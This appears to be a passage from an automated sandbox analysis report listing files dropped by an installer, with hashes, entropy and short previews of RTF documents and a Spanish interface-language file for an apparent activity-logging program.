                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panos
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43030
                                                                                                                                                                                                                                                          Entropy (8bit):5.037181036721856
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqel4jeXCpMF2njX8x3JLjwUtqYepjRBcnjX8x3TRbyqfVHVU3icdXPIZnZ/6A9C:qq3pDIA9C
                                                                                                                                                                                                                                                          MD5:67B098FD7DC727E81D9D9FB9A520E1CE
                                                                                                                                                                                                                                                          SHA1:F6D0526FD0E5F10956988840D866DD2222ABF783
                                                                                                                                                                                                                                                          SHA-256:C3AF56E516BBA805D97730CC1303C32539C72A4E93F598F599EE4DE1756AB0BF
                                                                                                                                                                                                                                                          SHA-512:65718F4601D9636CE73B3B5D2E5EDC62B34DAE818C7450033BEC2221916E8AC81316D6EB3F3690186E3A505F82192A4C1EE34D12606690B3B266A2BEDE2F7DEA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19915
                                                                                                                                                                                                                                                          Entropy (8bit):4.91205436276521
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:URE/HLpJKNLC8/c0vrhUhdpZ/i7fTfHV8Vpx+M26iYi/pVF8g2EM2luoEJroH:Ue4L5c0dffTfHV8Vpx126PGcIMoH
                                                                                                                                                                                                                                                          MD5:86FB78830003953DE6F23C5978938899
                                                                                                                                                                                                                                                          SHA1:CD181B6DD4049697DD2E824DCABB57D9B21CCE0A
                                                                                                                                                                                                                                                          SHA-256:0E132271314F42D37505EA9844E8EE102B9A0FC65946852BE8150CD088BB8357
                                                                                                                                                                                                                                                          SHA-512:8862242298848BF0096B63F5F0FDDC70C446239910DD16F7B5AB604414CB6D10DFB636A7BC7AD1D66F33B6D88DCC08EE95F0B0B04E686E74E68FFBF9EC70C47A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart=" Empec."..tbStartHint="Habilite el registro"..tbStop="Det.ngase"..tbStopHint="Desactive el registro"..tbFind="Encuentre"..tbFindHint="Busque la informaci.n del registro"..tbSetting="Ajustes"..tbSettingHint="Ajustes del programa"..tbAbout="Acerca de"..tbAboutHint="Acerca de / informaci.n de registro"..tbHomePage="P.gina Principal"..tbHomePageHint="Ir a la P.gina Principal del programa"..tbToday="Hoy"..tbTodayHint="Ir al registro de hoy"..tbHide="Oculte"..tbHideHint="El modo invisible (ninguno icono en la bandeja del sistema)"..tbMinimize="Minimice"..tbMinimizeHint="Minimizar a la bandeja"..tbExit="Salir"..tbExitHint="Salir y parada del registro"..gbLog="Registro de eventos"..tCurrLogSize="Tama.o del registro (Mb)"..tCu
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45050
                                                                                                                                                                                                                                                          Entropy (8bit):5.040256574487364
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4JtHiBkyKWm+m2NjrOX/zJnKujtCUcFsWjeQ2CzLZ7RntKuG5QZ2y3OE50sq:VkNk4TF
                                                                                                                                                                                                                                                          MD5:94F6C834BB72118F52C6E4AFA65342BF
                                                                                                                                                                                                                                                          SHA1:5066CA137EA8AE0F1CFDB50D364C0A85BF31B98D
                                                                                                                                                                                                                                                          SHA-256:E950C0B4282DDB4BBBCA54BB72CB789B117690E1EFA15D7BE6C59BE5D77A65EA
                                                                                                                                                                                                                                                          SHA-512:80147E578792B71F77E06659978C233E4BE7AB1352B056DEC3BCA74A0E5F5A6386983B5935467BDDA4DDF34CD64304843903A85DAC3C813DCF49457810E670E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37942
                                                                                                                                                                                                                                                          Entropy (8bit):5.034259997396652
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4Jt0TaGC5X2kLuuXprzghApkH9bEJzKv3TFeq4T5:VkHwd4T5
                                                                                                                                                                                                                                                          MD5:A4F051708B7CC7EC3B58CB0A01A56DAA
                                                                                                                                                                                                                                                          SHA1:4C4D011C0EFC5497763698DD21BE21D61553EE51
                                                                                                                                                                                                                                                          SHA-256:E5AC50A87DD55807C9FC5BDF12C6317581F50456A9D99EF92794F5C089748F6E
                                                                                                                                                                                                                                                          SHA-512:EFEF770ED92BB6F5D76AB7613ADF47ADF264CBBBFB741D7514A9424D77055CA01DCD1462DAFA2A8CF9E9FAF36931F78865430FE62F30DC77A9F18E0A28C8EC37
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37309
                                                                                                                                                                                                                                                          Entropy (8bit):5.035450399129397
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4JtOiBkyKWm+XcOl66fSndrdyzotzrcq4Ta:VkHHu4Ta
                                                                                                                                                                                                                                                          MD5:C121D028E5250297A8B932011A8122F9
                                                                                                                                                                                                                                                          SHA1:6E9E2CAE5D2200213EA2378E2F02E4237F0EA7F1
                                                                                                                                                                                                                                                          SHA-256:8246FF97F5D8EA82D7D9C00EC53309DC207026DD6B406B7B77E873563AB424DF
                                                                                                                                                                                                                                                          SHA-512:F93C9D589271DA049E037F0491E9B34CA1574113F488DDF302370BB1BC4CE55985A27A294B37A50100BEA4C9E209B5C6D8020843BD404B571B99E112E6F1CB3D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36554
                                                                                                                                                                                                                                                          Entropy (8bit):5.033242301326159
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:w4FkNxjETicPI0QhhiLVUO9HZYSEWsIZ/6A9V:w4G3UntIA9V
                                                                                                                                                                                                                                                          MD5:60CFC0AB1C3A23B456BDEB0DD8010A83
                                                                                                                                                                                                                                                          SHA1:E2EB5D85ECC146BA756BB812247090D421D8F906
                                                                                                                                                                                                                                                          SHA-256:FB9A493F603C0027F6782538022DA6D82577FC0CE69146E66076EF94440B7D18
                                                                                                                                                                                                                                                          SHA-512:80ABA72B39079A7B4378C0B106CBB0098AE94BEAC586DC34BE10F5CE2D7F0193B20A215F0D98D08A709F934CB1AC05FCE6B15270D3E855F01BD9C814D95AA4AB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):78220
                                                                                                                                                                                                                                                          Entropy (8bit):4.998804403921912
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:w4NORVKcNG59+ppOBpvKeGpWONtetjIC1uCLCCiOBG/60Oc5IRcofyW26IA9w:w2GVFU59+/O3vKeO+5G
                                                                                                                                                                                                                                                          MD5:284D049932C02AFE360E12F1ACBBEB89
                                                                                                                                                                                                                                                          SHA1:F5D588FE773BF163D5FE123B38FCAF70AF53F786
                                                                                                                                                                                                                                                          SHA-256:9AD1BA3EF54FEA19A88AAABBAF13DBD8C798DA68B989F4E321594E54A5DB2AF6
                                                                                                                                                                                                                                                          SHA-512:AF4E3F43E6A258E8E45A2983A2DC1CE29190163B2DCDE25DC4AB3BFF4F1FC6E07E14BB4023FC5A7F7C008463BD1F8D7ADCB12D1FDAFD6503B41E94D2E98D74F8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42355
                                                                                                                                                                                                                                                          Entropy (8bit):5.0527900529716705
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmV4JAF/WMvgDNHkAwd6Lkygbq4TF:VklnIV4J34TF
                                                                                                                                                                                                                                                          MD5:6E4790A124B7FF2124F2D64A1F5935AE
                                                                                                                                                                                                                                                          SHA1:809C008765ADDE1CFF719DF84F5D1A6972C9D15A
                                                                                                                                                                                                                                                          SHA-256:7BC836689CF9FF9CF09F7E58AF04356C29C44CD67256FF828873AFAE1D9AD78A
                                                                                                                                                                                                                                                          SHA-512:9DA4AFC8A0E1A92A33ED8D33C8C3E6162DC0FCED24BF9A65A69ED92380B10E5B639E6809067E1D8A7F2BCD7300A809CFBA07693AF9A6B425CCDA76CAC53AB38C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45797
                                                                                                                                                                                                                                                          Entropy (8bit):5.048112106920449
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmms0Fzyf/8Ze52zxn1yIATqQfIUj1gCK/:VklnIsM4T4
                                                                                                                                                                                                                                                          MD5:B282950E706D40B97814A1BE2F1513FE
                                                                                                                                                                                                                                                          SHA1:82318E2310302B88264AF88800CB5A6762446C20
                                                                                                                                                                                                                                                          SHA-256:C93DEB9DF3F1878F380EC3C9348E22E07A5A38CC005D180FFAE3EF7C663BA567
                                                                                                                                                                                                                                                          SHA-512:0A5128EE9895BDB59F247B49B105E990675E27A9F93F006E88500CEBE5084722DD4D1CC74CDC31AC65AAAE0962D4FA2F1EDB96C26AA4CBE733054B35D047C49B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38095
                                                                                                                                                                                                                                                          Entropy (8bit):5.023434979525739
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:qY6g3X45Y8qb7PzybdKkjYeQZBzyKIl6ZIi6rGsoUwEAG2DaGZ:qhg3feQZ5yKIl2U4Z
                                                                                                                                                                                                                                                          MD5:BF8EAEFA279A7B4973C0AEA344342EEA
                                                                                                                                                                                                                                                          SHA1:FC9B1F4747B94663D9BE6A446F8C186D981321F0
                                                                                                                                                                                                                                                          SHA-256:05D8BABE44F84B4DD6022B8D236C2BF93917E8E38C14F3B700186B8C3C1209C0
                                                                                                                                                                                                                                                          SHA-512:DDB4F723299CB3F50206830FD9809198923FAE710CE314A22558C26D235B85E1BAC6562C8A17C723857734DB0432158FC22450FE43AB3A0FFF5704D8CA885175
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang3082\deflangfe3082\themelang3082\themelangfe0\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fh
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37942
                                                                                                                                                                                                                                                          Entropy (8bit):5.034259997396652
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4Jt0TaGC5X2kLuuXprzghApkH9bEJzKv3TFeq4T5:VkHwd4T5
                                                                                                                                                                                                                                                          MD5:A4F051708B7CC7EC3B58CB0A01A56DAA
                                                                                                                                                                                                                                                          SHA1:4C4D011C0EFC5497763698DD21BE21D61553EE51
                                                                                                                                                                                                                                                          SHA-256:E5AC50A87DD55807C9FC5BDF12C6317581F50456A9D99EF92794F5C089748F6E
                                                                                                                                                                                                                                                          SHA-512:EFEF770ED92BB6F5D76AB7613ADF47ADF264CBBBFB741D7514A9424D77055CA01DCD1462DAFA2A8CF9E9FAF36931F78865430FE62F30DC77A9F18E0A28C8EC37
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44885
                                                                                                                                                                                                                                                          Entropy (8bit):5.051249541456295
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmqoFleTHHqaXD8TfLlCeTxDn4UfvUwNi:VklnIqN4Tm
                                                                                                                                                                                                                                                          MD5:26DF31606E6051A5AB82AFA526964B5B
                                                                                                                                                                                                                                                          SHA1:E567611817B3963033B65E615EE4ABB3FCE7499A
                                                                                                                                                                                                                                                          SHA-256:8B807D3D26611E1DD448B29E0626173AE0C4077974E4BC018358536D48A6F510
                                                                                                                                                                                                                                                          SHA-512:49BF5203F94FDB4136E58F17CFF137DD5685372A135701E22649E1B2661A3F48AD09B2FE6EDBA57AF4DD80C0766934AE2A281F845D32C9D529A3C20A3E9315F6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
